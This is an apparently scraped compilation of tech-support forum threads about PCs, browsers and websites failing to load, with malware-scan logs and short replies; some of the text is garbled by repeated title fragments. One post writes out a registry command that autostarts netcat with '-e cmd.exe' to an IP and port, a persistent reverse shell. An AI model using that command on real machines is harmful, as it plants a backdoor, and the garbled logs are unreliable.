Hello everyone Please help me My internet on the laptop is acting weirdly some sites will load easily and some just takes forever to load I m currently running an antivirus and spyware doctor on the laptop Here s my hijack log please help thanks in advance Logfile of Trend Micro HijackThis v Scan saved at PM on Platform Windows XP SP WinNT MSIE Internet Explorer v Boot mode Normal Running processes C WINDOWS System smss exe C at all, doesnt some load please help websites WINDOWS system csrss exe C WINDOWS system winlogon exe C WINDOWS system services exe C WINDOWS system lsass exe C WINDOWS system svchost exe C WINDOWS system svchost exe C WINDOWS System svchost exe C WINDOWS system svchost exe C some websites doesnt load at all, please help WINDOWS system svchost exe C WINDOWS system svchost exe C WINDOWS System WLTRYSVC EXE C WINDOWS System bcmwltry exe C WINDOWS system spoolsv exe c program files some websites doesnt load at all, please help common files logitech lvmvfm LVPrcSrv exe C Program Files Common Files Apple Mobile Device Support bin AppleMobileDeviceService exe C Program Files Bonjour mDNSResponder exe C Program Files Common Files Creative Labs Shared Service CreativeLicensing exe C WINDOWS system CTsvcCDA exe C Program Files Common Files Authentium AntiVirus dvpapi exe C Program Files iolo common lib ioloServiceManager exe C Program Files Dell QuickSet NICCONFIGSVC exe C Program Files Spyware Doctor pctsAuxs exe C Program Files Spyware Doctor pctsSvc exe C WINDOWS Explorer EXE C Program Files Synaptics SynTP SynTPEnh exe C WINDOWS system WLTRAY exe C Program Files Creative SBAudigy Surround Mixer CTSysVol exe C WINDOWS system Rundll exe C Program Files Creative VoiceCenter AndreaVC exe C WINDOWS system LVCOMSX EXE C Program Files Logitech Video CameraAssistant exe C DOCUME Soukie LOCALS Temp clclean C WINDOWS System DLA DLACTRLW EXE C Program Files Google Google Desktop Search GoogleDesktop exe C Program Files iolo System Mechanic Professional AntiVirus ioloAV exe C Program Files Spyware Doctor pctsTray exe C Program Files iTunes iTunesHelper exe C Program Files Google Google Desktop Search GoogleDesktopIndex exe C WINDOWS system Rundll exe C Program Files iolo System Mechanic Professional Personal Firewall ioloFW exe C Program Files NetWaiting netWaiting exe C Program Files Dell Support DSAgnt exe C Program Files Messenger msmsgs exe C WINDOWS system ctfmon exe C WINDOWS system svchost exe C Program Files Google Google Desktop Search GoogleDesktopCrawl exe C Program Files Digital Line Detect DLG exe C Program Files iPod bin iPodService exe C WINDOWS system wbem wmiprvse exe C WINDOWS System alg exe C Program Files Internet Explorer iexplore exe C WINDOWS system wuauclt exe C Program Files iolo System Mechanic Professional AntiVirus iAVEmailScanner exe C Program Files Common Files Microsoft Shared Windows Live WLLoginProxy exe C WINDOWS system Notepad exe C WINDOWS system wbem wmiprvse exe C Documents and Settings Soukie My Documents Downloads HijackThis exe R - HKCU Software Microsoft Internet Explorer Main Search Page http go microsoft com fwlink LinkId R - HKCU Software Microsoft Internet Explorer Main Start Page http forums t-intermedia com index php R - HKLM Software Microsoft Internet Explorer Main Default Page URL http go microsoft com fwlink LinkId R - HKLM Software Microsoft Internet Explorer Main Default Search URL http go microsoft com fwlink LinkId R - HKLM Software Microsoft Internet Explorer Main Search Page http go microsoft com fwlink LinkId R - HKLM Software Microsoft Internet Explorer Main Start Page http go microsoft com fwlink LinkId R - HKLM Software Microsoft Internet Explorer Search Default Page URL www google com ig dell hl en amp client dell-usuk amp channel us amp ibd R - HKCU Software Microsoft Internet Explorer Main Local Page R - HKLM Software Microsoft Internet Explorer Main Local Page R - HKCU Software Microsoft Windows CurrentVersion Internet Settings ProxyServer R - HKCU Software ... Read more

A:some websites doesnt load at all, please help

Please visit this webpage for instructions for downloading and running ComboFix.

Post the log from ComboFix when you've accomplished that, along with a new HijackThis log.

https://forums.techguy.org/threads/some-websites-doesnt-load-at-all-please-help.738844/
Relevancy 73.96%

My PC was working fine I disconnected all the peripherals because I was moving it to the other side of the room After everything is re-connected the first thing I get is a forever loading Windows XP screen I figure ok that happens sometimes load Computer :) - doesnt Help reset When I reset I get quot System Disk Failure press any keep to reboot quot SO I reboot and enter the BIOS to make sure it see's the HDD It doesn't I reboot Computer doesnt load - Help :) again check BIOS bam it's there Back to the forever loading Windows XP screen I can enter Safe Mode I tried to restore to a few days ago when I am sure it was working fine it went to the forever Windows XP loading screen when I reboot and enterewd Safe Mode again I got notification that my restore was successfull So here I have Computer doesnt load - Help :) it hit and miss sometimes it see's the HDD sometimes it doesnt when it does I keep getting stuck at the Windows XP loading screen Heres what I have tried so far -Re-seated the cables to the HDD -Changed boot priority from CD Rom first to HDD first -Banged head on wall a thousand times -Cried myself to sleep Any suggestions

A:Computer doesnt load - Help :)

Hi and Welcome to TSF

I was leaning towards a loose connection at first but when you stated you reseated and tightly fitted all the connections I was alittle surprised.
Is your system using a SATA hard drive? I find those connectors are always making their was loose. This would explain your errors you are recieving.

http://www.techsupportforum.com/forums/f10/computer-doesnt-load-help-130977.html
Relevancy 73.96%

Hi,

Alright well this all started like 2~3 days ago. We moved our site to cjb.net and it all worked perfectly, than the next day the site nor any freeweb site loaded.

Our site is: www.twistedLegacies.cjb.net

When I load it comes up with:

Loading data from paypopunder.paypopup.com than it says Transfering data from paypopunder.paypopup.com than it doesnt load and says:

Unable to connect to www.freewebs.com

I restored my comp to like 2 weeks ago and it still didnt work. Does this have something to do with my firewall?

Im using Nortons + Zonealarm, its weird.. all was well 2 days ago now its all messed up.

Any ideas? I tried using firefox + IE and still no luck.

A:Freewebs doesnt load?

It may be that your security software is stopping the popunders from loading.

Makes sense ... cjb may have been added to a blocklist as well.

My long-term solution - get away from cjb ASAP and find an inexpensive host that doesn't deal in ads and spyware. 2mhost.com is $2.95 a month - check it out.

http://www.techsupportforum.com/forums/f10/freewebs-doesnt-load-94642.html
Relevancy 73.1%

hello, my sister has this issue. she boots her computer and it doesnt load past the welcome screen(light blue screen with welcome lol). i boot in safe mode w/o networking and it works, but when i try with networking it doesnt. i also ran recovery console chkdsk /p and /r and fixboot and fixmbr and still same problem, i ran malwarebytes/avg, ccleaners registry "cleaner" to no avail. any suggestions?!?!?!?!

A:Pc doesnt load past welcome screen

If Safe Mode works but Safe Mode with Networking doesn't work then that would suggest to me that the problem may lie with the network adaptor driver. You could try reinstalling it.

http://www.bleepingcomputer.com/forums/t/294232/pc-doesnt-load-past-welcome-screen/
Relevancy 73.1%

heres my logLogfile of Trend Micro HijackThis v Scan saved at AM on Platform Windows XP SP WinNT MSIE Internet Explorer v SP Boot mode NormalRunning processes C WINDOWS System smss exeC WINDOWS system winlogon exeC WINDOWS system services exeC WINDOWS system lsass exeC WINDOWS system svchost exeC WINDOWS System svchost exeC WINDOWS system spoolsv exeC WINDOWS Explorer EXEC WINDOWS arservice exeC WINDOWS eHome ehRecvr exeC WINDOWS eHome ehSched exeC WINDOWS system nvsvc exeC WINDOWS system dllhost exeC WINDOWS system Doesnt Firefox Load Mozilla ctfmon exeC WINDOWS System svchost exeC WINDOWS system wuauclt exeC WINDOWS system wuauclt exeC Documents and Settings HP Administrator Desktop HijackThis exeR - HKCU Software Microsoft Internet Explorer Main Default Page URL http ie redirect hp com svs rdr TYPE a amp pf desktopR - HKCU Software Microsoft Internet Explorer Main Default Search URL http ie redirect hp com svs rdr TYPE a amp pf desktopR - HKCU Software Microsoft Internet Explorer Main Start Page http www yahoo com R - HKLM Software Microsoft Internet Explorer Main Default Page URL http ie redirect hp com svs rdr TYPE a amp pf desktopR - HKLM Software Microsoft Internet Explorer Main Search Bar http ie redirect hp com svs rdr TYPE a amp pf desktopR - HKLM Software Microsoft Internet Explorer Main Search Page http ie redirect hp com svs rdr TYPE a amp pf desktopR - HKLM Software Microsoft Internet Explorer Main Start Page http ie redirect hp com svs rdr TYPE a amp pf desktopR - URLSearchHook Mozilla Firefox Doesnt Load Yahoo Toolbar - EF BD -C FB- D - F- D F - C Program Files Yahoo Companion Installs cpn yt dllO - BHO amp Yahoo Toolbar Helper - D -C F - efb- B - ECA - C Program Files Yahoo Companion Installs cpn yt dllO - BHO AcroIEHlprObj Class - E F-C D - D -B D- B D BE B - C Program Files Adobe Acrobat ActiveX AcroIEHelper dllO - BHO NAV Helper - A F D D-E - D -B A - BB FDD - c Program Files Norton Internet Security Norton AntiVirus NavShExt dllO - BHO Google Toolbar Helper - AA ED - DD- d - -CF F - c program files google googletoolbar dllO - BHO HpWebHelper - AAAE A- FFF- - C F- D DCB - C WINDOWS pchealth helpctr Vendors CN Hewlett-Packard L Cupertino S Ca C US plugin WebHelper dllO - BHO Google Toolbar Notifier BHO - AF DE - D - -B FA-CE B AD D - C Program Files Google GoogleToolbarNotifier swg dllO - Toolbar Norton AntiVirus - C E Mozilla Firefox Doesnt Load A- F - E-B E- B - c Program Files Norton Internet Security Norton AntiVirus NavShExt dllO - Toolbar amp Google - C B - - d - B - A CD F - c program files google googletoolbar dllO - Toolbar Yahoo Toolbar - EF BD -C FB- D - F- D F - C Program Files Yahoo Companion Installs cpn yt dllO - HKLM Run NvCplDaemon RUNDLL EXE C WINDOWS system NvCpl dll NvStartupO - HKLM Run nwiz nwiz exe installO - HKCU Run ctfmon exe C WINDOWS system ctfmon exeO - DEFAULT User Startup Pin lnk C hp bin CLOAKER EXE User 'Default user' O - Extra context menu item E amp xport to Microsoft Excel - res C PROGRA MICROS OFFICE EXCEL EXE O - Extra button no name - B E C - FCB- CF-AAA - C - C Program Files Java jre bin npjpi dllO - Extra 'Tools' menuitem Sun Java Console - B E C - FCB- CF-AAA - C - C Program Files Java jre bin npjpi dllO - Extra button Research - B - CC- C -B BE- C C A - C PROGRA MICROS OFFICE REFIEBAR DLLO - Extra button Internet Connection Help - E D D B- - a -B F- D D C - C WINDOWS PCHEALTH HELPCTR Vendors CN Hewlett-Packard L Cupertino S Ca C US IEButton support htmO - Extra 'Tools' menuitem Internet Connection Help - E D D B- - a -B F- D D C - C WINDOWS PCHEALTH HELPCTR Vendors CN Hewlett-Packard L Cupertino S Ca C US IEButton support htmO - Extra button Messenger - FB F -F - d -BB E- C F - C Program Files Messenger msmsgs exeO - Extra 'Tools' menuitem Windows Messenger - FB F -F - d -BB E- C F - C Program Files Messenger msmsgs exeO - Trusted Zone http trymedia com HKLM O - DPF - f - bb - d -fa d f a ab Installation Support - C Program Files Yahoo Common Yinsthelper dllO - DPF ... Read more

A:Mozilla Firefox Doesnt Load

Merged topics. Topic title was: Computer Seems Messed Up, slow computer / can't install programs ~ OBthe computer seem to be getting slower and slower ive been cleaning the inside of the comptuer and freeing up space but its still slowand im not able to install some programs or use firefoxLogfile of Trend Micro HijackThis v2.0.2Scan saved at 12:05:38 PM, on 6/10/2008Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\ctfmon.exeC:\Program Files\AIM6\aim6.exeC:\Program Files\AIM6\aolsoftware.exeC:\Program Files\Internet Explorer\IEXPLORE.EXEC:\WINDOWS\arservice.exeC:\WINDOWS\eHome\ehRecvr.exeC:\WINDOWS\eHome\ehSched.exeC:\WINDOWS\system32\nvsvc32.exeC:\WINDOWS\system32\dllhost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Internet Explorer\iexplore.exeC:\WINDOWS\system32\wuauclt.exeC:\Documents and Settings\HP_Administrator\Desktop\HijackThis.exeR1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&a...&pf=desktopR1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&a...&pf=desktopR0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&a...&pf=desktopR1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://ie.redirect.hp.com/svs/rdr?TYPE=3&a...&pf=desktopR1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&a...&pf=desktopR0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&a...&pf=desktopR3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dllO2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dllO2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dllO2 - BHO: NAV Helper - {A8F38D8D-E480-4D52-B7A2-731BB6995FDD} - c:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dllO2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dllO2 - BHO: HpWebHelper - {AAAE832A-5FFF-4661-9C8F-369692D1DCB9} - C:\WINDOWS\pchealth\helpctr\Vendors\CN=Hewlett-Packard,L=Cupertino,S=Ca,C=US\plugin\WebHelper.dllO2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dllO3 - Toolbar: Norton AntiVirus - {C4069E3A-68F1-403E-B40E-20066696354B} - c:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dllO3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dllO3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-... Read more

http://www.bleepingcomputer.com/forums/t/151023/mozilla-firefox-doesnt-load/
Relevancy 73.1%

When I click on Windows update in all programs or simply navigate to microsofts website, internet explorer gives me the "This page cannot be diplayed" error.

What?

I just reinstalled my OS, wanted to get updates and I cant because for some strange reason their website wont load. I can navigate to any other website but microsofts.

Ive got SP1, and all drivers installed. However, Im not sure on the SMbus controller. I installed it, it says there is no driver installed for this device... weird.

My system is an HP pavilion 516x

why is microsoft apparently blocked on my system??

thanks

A:Microsoft webpage doesnt load

It sounds like your browser (or host file) may have a problem and should be re-installed. A work-around might be to download & install FireFox, then see if you can hit microsoft.com. If you can, download the latest IE browser and install it. If you can't, copy your host file here and we'll take a look.

File is in c:\windows\system32\drivers\etc

http://www.bleepingcomputer.com/forums/t/322374/microsoft-webpage-doesnt-load/
Relevancy 73.1%

Hello everyone,

I'm using windows 7 32bit in my VMware machine and i'm trying to make a program load on startup.
This program is netcat , i'm running a project on my university and i gotta make it load on boot.

On cmd i'm executing the following command to add netcat on startup registry:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "netcat" /t REG_SZ /d "%windir%\system32\nc.exe 192.168.2.2 10001 -d -e cmd.exe"

where "%windir\system32\nc.exe" is the path i put "nc.exe" into , and "192.168.2.2 10001" is the local IP and port that it is gonna connect to on boot.

Anyone has any idea why when my VMware machine reboots nc.exe never runs on startup?
Any help would be much appreciated.
Thanks in Advance.

A:.exe program doesnt load on startup

Hi and welcome to Seven Forums!!!

You can try CodeStuff Starter.
With this free program you can add, edit and delete programs that run at boot.

Hope this helps

CyberZeus

http://www.sevenforums.com/general-discussion/291261-exe-program-doesnt-load-startup.html
Relevancy 73.1%

My win7 cant load explorer.exe on login , and doesnt.load when using task manager to.run.it as well

all I get is a.black.screen with a.cursor

http://www.techspot.com/community/topics/explorer-exe-doesnt-load-on-login.212360/
Relevancy 73.1%

hi there, i was usng my pc no longer than an hour ago, but the last thing i rember doing on it (I.E. installing etc) was installing the new msn messenger, but i then switched it off to look at the processor (i had to take out the power pack completely), i have done this once before, it didnt mess up then. i then put it back together and turned it out, it loaded BIOs fine, it went through the partition part fine, but as soon as u pass that bit where the Windows XP is SUPPOSED to load, it goes blank, loads nothing, does nothing, i have wiped it twice now, still no change, cna anyone help me plz?????

A:Xp Doesnt Load (no loading screen)

Hi, welcome to TSF.

Check all power connections inside the computer again - especially any power connection on the video card (if you have one).

Does Windows start in Safe mode?

Reapply thermal paste if you removed the CPU heatsink.

http://www.techsupportforum.com/forums/f10/xp-doesnt-load-no-loading-screen-226044.html
Relevancy 73.1%

Hi everyone, im new to this website so i appreciate all the help i can get.
The other day my computer came up saying i have spyware on my computer and needed a full system scan, it was a worm.win32.netsky that appeared so i downloaded avg, did a full system scan and then it asked for the computer to be restarted. so i did. when it restarted after the welcome screen it showed my XP background screen and nothing else happened. If i press CTRL ALT DELETE it says task manager has been disabled by administrator. the start bar doesnt load so i cant goto Start ---> Run.

Any help would be greatly appreciated. thanks

Relevancy 73.1%

I HAVE WINDOWS XP, USING AOL 9.0 .
FOR 2 WEEKS NOW IVE BEEN TRYING TO ACCESS MY LEAGUE'S WEB PAGE, BUT WITH NO LUCK .IT ALWAYS STARTS TO LOAD THE RE-DIRECTS ITSELF.
I HAVE TAKEN PUTER BACK TO FACTORY SETTINGS DONE LOADS VIRUS SCANS........NOTHING FOUND.I HAVE DEFRAGED, AND CLEAN UP DISK DRIVE.IHAVE DELETE COOKIES.FINALLY I SPENT THE BEST PART OF A MORNING WITH AOL LIVE TECH CHAT, TO BE TOLD ITS NOT THEIR PROBLEM, THEY HAD MY UNINSTALLING AOL ADAPTER AND CHECKING MY SECURITY AND KEPT ASKING TO CHECK WEBB ADDY EVEN THOUGH THEY SAID IT LOADS.
THERES 140 MEMBERS IN THSI LEAGUE AND ONLY I HAVE THE PROBLEM.OTHER AOL USERS HAVE REPORTED IT THEY MISS OUT A "DOT" THEY GET IY BUT OTHERWISE NO PROBLEMS.
THE SITE ADDY IM TRYING TO GET TO IS http://slingogigs.web1000.com/frenzy.html
WHAT I GET IS "PAYSFORSURVEYS.COM"

Relevancy 73.1%

i just reinstalled windows xp. because my computer was acting all weird and wouldnt load explorer.exe after the installation i am unable to start up my task manager, alt ctrl delete doesnt work, nor does using the taskbar to open it up. and my CMD doesnt work either. any help ? thanks

A:task manager doesnt load

Hello steven,

Did you format the drive or just run a Windows Repair?

http://www.techsupportforum.com/forums/f10/task-manager-doesnt-load-369550.html
Relevancy 73.1%

i dont realy know when it happened but yesterday i wanted to update my score
and some why my performance page doesnt load :

A:performance pager doesnt load

Hello Scorp,

Double check to make sure that WEI is still enabled.

Windows Experience Index - Enable or Disable

Hope this helps,
Shawn

http://www.vistax64.com/general-discussion/264019-performance-pager-doesnt-load.html
Relevancy 73.1%

Last night my pc crashed.. i turned it off put it back on an it whudnt load. I try start it an it comes on but the screen jus goes on standby, when i turn the screen off an on, still the same. Is my graphics card messed up? my ram? or my processor? im on xp... i hope som1 knows whats wrong wit it :S cuz i sure dont lol thanx peeps oh an the tower seems to still be runnin.. but jus wont load..

Relevancy 72.67%

I have been a big chrome fan for a while now but lately my chrome has decided not to open or if I'm lucky enough and it does open it will load web pages very slowly or not at all

and yes i have reinstalled, many times

Any help appreciated

http://www.techsupportforum.com/forums/f120/google-chrome-doesnt-load-or-respond-673417.html
Relevancy 72.67%

Hi

In order to load a game which im have trouble installing, i was told to try installing it in safe mode. but when i load safe mode the screen stays black (apart from having safe mode in the four corners) but the desktop doesnt load up. The only thing i can do is ctrl,alt & del to bring up the task manager but it will not let me load anything from there either!

A:Safe Mode Doesnt Load To Desktop???

Ive just googled the problem and i cannot find a solution elsewhere.

https://forums.techguy.org/threads/safe-mode-doesnt-load-to-desktop.750472/
Relevancy 72.67%

I have a windows 7 Laptop and it runs really smoothly and fast.

But a lot of the time, if i try to use flash based applets on webpages - mainly live tv webpages like ustream.tv, justin.tv or callofthecommunity.com it will not load the flash.

It's just a blank black square where the video streaming should be.

Certain sites work, YouTube.com, and blogtv.com work. But i'd really like to get those ones that dont to work.

Ive tried those sites on other computers and it works fine

I use the latest version of Firefox (5.0) and Ive tried using the same sites on internet explorer and google chrome. Still the same problem.

I had a feeling something was wrong with my Flash player.. so i installed the newest version - think it was from macromedia.com (do i need a different version maybe?)

A:[SOLVED] Flash Doesnt Load on Certain Sites

Post a link to a site that does not work. There may be something wrong with the site that is not connected to the flash not working as a cause. Fails your Security settings, maybe. Revoked certificate. Etc....

http://www.techsupportforum.com/forums/f217/solved-flash-doesnt-load-on-certain-sites-589467.html
Relevancy 72.67%

hi,

my pc doesnt even get to the windows screen and it starts to make this annoying beeping noise
i wonder if anyone can help.

ive tried cleaning the fans of dust etc. but i have no idea where to go from there.

any help or suggestions would be a real help.

A:Doesnt Load And Makes A Beeping Noise

Need more information to help you with this. What is the make and model of your computer? Those beeps you are hearing are BIOS error codes. Depending on what BIOS your computer has installed these codes will tell you where the problem is. So give us more information and we can take it from there.

http://www.bleepingcomputer.com/forums/t/65740/doesnt-load-and-makes-a-beeping-noise/
Relevancy 72.67%

im running win xp pro sp2 ...my pc was running fine till yesterday.i get connected to internet(ie 8) but the page doesnt display.it says," the page might have been moved to another location".but when i turn on my vpn (hotspot shield 1.37) it works,,the pages are displayed and work fine. is there a way to view web pages without enabeling hotspot shield..

Relevancy 72.24%

as per title what i have tried is checking the installation media is good which it is checked it on another rig running windows 10. okay so what happens is it will go through the normal boot up procedure my rig that is, bios will post normally and then i get the windows 10 logo screen. u know where the little windows circly thing will go around and at about the 7th time the litlte circly thing goes around my screen will freeze same goes with the installation media which i am running on a usb, so i am stumped because i cant even load from the usb to try and repair my computer. any help willl be great.
THANKS
RUBEN
p.s.
I am currently in the process of trying to install windows 7 and see if that will help.

A:windows wil not load nor will it load with installiation media

okay well it did the same thing with windows 7 install. it will go through the loading windows files and then the little windows logo will pop up u know the little R,G,B,Y flag which pulsates and on about the fifth pulsate it will freeze.
THANKS IN ADVANCE
RUBEN

http://www.techsupportforum.com/forums/f338/windows-wil-not-load-nor-will-it-load-with-installiation-media-1039897.html
Relevancy 72.24%

This just started happening last night. Earlier that day I bought a 160gb seagate external HD at Fry's for 50 bux and was moving tons a files over to it (for about 3 hours). At one point I cancelled uploading and rebooted fine, but later that night my girlfriend did the same thing and rebooted and XP will not load... not in safe mode. I didn't install anything with the external HD as it was Plug n Play and I didn't install any new programs yesterday either...

I don't have a Win XP CD either (or boot disk). I guess my first action will need to be to buy Win XP and try a system recovery?

Is there any way to find out what is stopping it from loading?

I also switched the memory sticks with some other memory and that did nothing...

I'm at a loss :l

A:Windows XP won't load passed the load screen...

ap f8 when booting and from the options try
last known good configuration
if that's no good boot into the recovery console and try
fixboot

http://www.techsupportforum.com/forums/f10/windows-xp-wont-load-passed-the-load-screen-152452.html
Relevancy 71.81%

DDS Ver - - - NTFSx Internet Explorer Run by Administrator at on or redirects a page to blank Google doesnt load - - Microsoft Windows XP Professional GMT AV ESET NOD Antivirus Enabled Updated E E D - - F - FB -D ACA F C Running Processes C WINDOWS system svchost -k DcomLaunch svchost exe C WINDOWS System svchost exe -k netsvcs svchost exe svchost exe C WINDOWS system spoolsv exe C WINDOWS Explorer EXE C Program Files ESET ESET NOD Antivirus ekrn exe C Program Files USBAntiVirus USBAntiVirus exe C Program Files ESET ESET NOD Antivirus egui exe C Program Files Java jre Google redirects to a blank page or doesnt load bin jqs exe C WINDOWS PixArt PAC Monitor exe D Malwarebytes Anti-Malware mbamgui exe C WINDOWS system ctfmon exe D Malwarebytes Anti-Malware mbamservice exe C WINDOWS system svchost exe -k imgsvc C WINDOWS system wscntfy exe C Documents and Settings Administrator Local Settings Application Data Google Chrome Application chrome exe C Documents and Settings Administrator Local Settings Application Data Google Chrome Application chrome exe C Documents and Settings Administrator Local Settings Application Data Google Chrome Application chrome exe C Documents and Settings Administrator Local Settings Application Data Google Chrome Application chrome exe C Documents and Settings Administrator Local Settings Application Data Google Chrome Application chrome exe C Documents and Settings Administrator Local Settings Application Data Google Chrome Application chrome exe C Documents and Settings Administrator Local Settings Application Data Google Chrome Application chrome exe C Documents and Settings Administrator Local Settings Application Data Google Chrome Application chrome exe Pseudo HJT Report uStart Page about blank uInternet Connection Wizard ShellNext hxxp www google com support chrome bin request py hl en-US Google redirects to a blank page or doesnt load amp contact type uninstall amp crversion amp os BHO Adobe PDF Link Helper df c-e ad- -a -fa c ebdc - c program files common files adobe acrobat activex AcroIEHelperShim dll BHO Groove GFS Browser Helper - c - d -b f - bbc d a e - c progra micros office GRA Google redirects to a blank page or doesnt load E DLL BHO Java Plug-In SSV Helper bb-d f - c-b eb-d daf d d - c program files java jre bin ssv dll BHO Java Plug-In SSV Helper dbc -a - b-bc - c c c a - c program files java jre bin jp ssv dll BHO JQSIEStartDetectorImpl Class e e f - ce- c -bc -eabfe f c - c program files java jre lib deploy jqs ie jqs plugin dll uRun uTorrent quot d program files uTorrent exe quot MINIMIZED uRun Facebook Update quot c documents and settings administrator local settings application data facebook update FacebookUpdate exe quot c nocrashserver uRun Google Update quot c documents and settings administrator local settings application data google update GoogleUpdate exe quot c uRun ctfmon exe c windows system ctfmon exe mRun USBAntiVirus exe c program files usbantivirus USBAntiVirus exe -Hide mRun egui quot c program files eset eset nod antivirus egui exe quot hide waitservice mRun PAC Monitor c windows pixart pac Monitor exe mRun Malwarebytes Anti-Malware quot d malwarebytes anti-malware mbamgui exe quot starttray uPolicies-explorer HideSCABattery x uPolicies-explorer NoResolveTrack x mPolicies-system DisableStatusMessages x IE E amp xport to Microsoft Excel - c progra micros office EXCEL EXE IE FB F -F - d -BB E- C F IE A- - f c- - EE C C - E -E D - - C-F F E C - c progra micros office ONBttnIE dll IE B - CC- C -B BE- C C A - FF E -CC A- E E-BF B- E D - c progra micros office REFIEBAR DLL DPF AD C - E- D -B E - F D - hxxp java sun com update jinstall- -windows-i cab DPF CAFEEFAC- - - -ABCDEFFEDCBA - hxxp java sun com update jinstall- -windows-i cab DPF CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA - hxxp java sun com update jinstall- -windows-i cab DPF D CDB E-AE D- CF- B - - hxxp download macromedia com pub shockwave cabs flash swflash cab TCP DhcpNameServer TCP Interfaces F D - BD- B C- DA- A... Read more

A:Google redirects to a blank page or doesnt load

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.Do not run any other tool untill instructed to do so!Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.Run Combofix:You may be asked to install or update the Recovery Console (Win XP Only) if this happens please allow it to do so (you will need to be connected to the internet for this)Before you run Combofix I will need you to turn off any security software you have running, If you do not know how to do this you can find out >here< or >here<Combofix may need to reboot your computer more than once to do its job this is normal.You can download Combofix from one of these links.Link 1Link 2Link 3 1. Close any open browsers or any other programs that are open.2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.Double click on combofix.exe & follow the prompts. When finished, it will produce a report for you. Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stallNote 2: If you recieve an error "Illegal operation attempted on a registery key that has been marked for deletion." Please restart the computer"information and logs"In your next post I need the following
Log from Combofixlet me know of any problems you may have had
How is the computer doing now?Gringo

http://www.bleepingcomputer.com/forums/t/445891/google-redirects-to-a-blank-page-or-doesnt-load/
Relevancy 71.81%

I started my computer today and the keyboard has the num lock lighht up then I go to login to my user account and NO KEYS WILL WORK!!!
I logged in with windows ease of access on-screen keyboard and then I tried my keyboard, NOTHING!
I checked the connection, rebooted, SAME THING!!!
I EVEN SWITCHED OUT WITH ANOTHER KEYBOARD and got same results. I've been using they same gateway keyboard that came with my computer 4 months ago!
I dont care how it goes, Just someone give me an idea of what is going on and how to fix it! No keyboard is huge! right now i'm using a useful laptop with a celeron.
I WANT MY QUAD CORE back!!

A:HUGE PROBLEM, keyboard doesnt want to work or load

You didn't say whether you are using a PS2 or USB keyboard. If it's PS2, you may have a bad port, otherwise you may have a USB problem. Have you tried your keyboard on another computer? You should be able to plug it in to your laptop and try it...

https://forums.techguy.org/threads/huge-problem-keyboard-doesnt-want-to-work-or-load.733173/
Relevancy 71.81%

I have a windows Laptop and it runs really smoothly and fast But a lot of the time if i try to use flash based applets on webpages - mainly live tv webpages like ustream tv justin tv or callofthecommunity com it will not load the flash It s just a blank black square where the video streaming should be Certain sites work YouTube com and blogtv com work But i d really like to get those ones that dont to work Ive tried those sites on other computers and it websites on Solved: Load Doesnt ceratin Flash works fine I use the latest version of Firefox and Ive tried using the same sites on internet explorer and google chrome Still the same problem I had Solved: Flash Doesnt Load on ceratin websites a feeling something was wrong with my Flash player so Solved: Flash Doesnt Load on ceratin websites i installed the newest version - think it was from macromedia com do i need a different version maybe Screenshots of the black boxes im seeing http i lulzimg com i e a png http i lulzimg com i png nbsp

A:Solved: Flash Doesnt Load on ceratin websites

You may need to clear the cache and cookies of the browsers to fix this problem. Here are the instructions for each browser: http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=32050

If the above solution does not work, then you might have to configure the Flash Player to allow third-party Flash content to store data on your computer. The instructions for this solution can be found on this webpage: http://casadeblundell.com/jonathan/ustream-videos-not-working-fixed/

Please feel free to post the results of these solutions into this thread.

Good luck!

https://forums.techguy.org/threads/solved-flash-doesnt-load-on-ceratin-websites.1011744/
Relevancy 70.95%

Dear Techsupport,

I recently installed CA security suite and have had some issues since.

